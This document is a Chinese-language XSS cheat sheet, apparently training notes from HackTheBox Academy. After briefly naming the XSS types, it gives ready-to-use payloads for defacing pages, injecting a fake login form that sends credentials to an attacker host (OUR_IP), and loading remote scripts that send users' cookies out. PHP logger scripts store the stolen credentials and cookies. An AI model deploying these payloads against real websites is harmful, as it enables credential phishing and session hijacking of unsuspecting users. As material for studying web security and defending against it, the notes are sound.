Cross-Site Scripting (XSS)

XSS 漏洞主要有三种类型:

Type Description
Stored (Persistent) XSS 最严重的 XSS 类型,发生在用户输入存储在后端数据库并在检索时显示(例如,帖子或评论)时
Reflected (Non-Persistent) XSS 用户输入经过后端服务器处理后显示在页面上,但未被存储(例如搜索结果或错误信息)时发生
DOM-based XSS 另一种非持久性 XSS 类型,当用户输入直接显示在浏览器中并完全在客户端处理,而无需到达后端服务器(例如,通过客户端 HTTP 参数或锚标记)时发生

污染页面元素

更改背景

1
2
3
4
5
<script>document.body.style.background = "#141d2b"</script>  
  
# or  
  
<script>document.body.style.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>

更改标题

1
<script>document.title = 'HackTheBox Academy'</script>

更改文本

1
2
3
4
5
document.getElementById("todo").innerHTML = "New Text"  
  
# or  
  
document.getElementsByTagName('body')[0].innerHTML = "New Text"

 XSS payload

1
<script>document.getElementsByTagName('body')[0].innerHTML = '<center><h1 style="color: white">Cyber Security Training</h1><p style="color: white">by <img src="https://academy.hackthebox.com/images/logo-htb.svg" height="25px" alt="HTB Academy"> </p></center>'</script>

image.png

Phishing

Phishing form

1
2
3
4
5
6
<h3>Please login to continue</h3>  
<form action=http://OUR_IP>  
    <input type="username" name="username" placeholder="Username">  
    <input type="password" name="password" placeholder="Password">  
    <input type="submit" name="submit" value="Login">  
</form>

Payload

1
2
3
4
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');<!--  
  
<!-- 删除某些元素 >  
document.getElementById('urlform').remove();

Server

1
nv -lvnp 80

or

1
2
3
4
5
6
7
8
9
<?php  
if (isset($_GET['username']) && isset($_GET['password'])) {  
    $file = fopen("creds.txt", "a+");  
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");  
    header("Location: http://SERVER_IP/phishing/index.php");  
    fclose($file);  
    exit();  
}  
?>

Hijacking

Fuzz

1
2
3
4
5
6
7
8
<script src=http://OUR_IP></script>  
'><script src=http://OUR_IP></script>  
"><script src=http://OUR_IP></script>  
javascript:eval('var a=document.createElement(\'script\');a.src=\'http://OUR_IP\';document.body.appendChild(a)')  
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//OUR_IP");a.send();</script>  
<script>$.getScript("http://OUR_IP")</script>  
  
...

Payload

1
'><script src=http://OUR_IP/script.js></script>

Server

script.js

1
2
3
document.location='http://OUR_IP/'+document.cookie;
// or
new Image().src='http://OUR_IP/'+document.cookie;

index.php

1
2
3
4
5
6
7
8
9
10
11
<?php  
if (isset($_GET['c'])) {  
    $list = explode(";", $_GET['c']);  
    foreach ($list as $key => $value) {  
        $cookie = urldecode($value);  
        $file = fopen("cookies.txt", "a+");  
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");  
        fclose($file);  
    }  
}  
?>
⬆︎TOP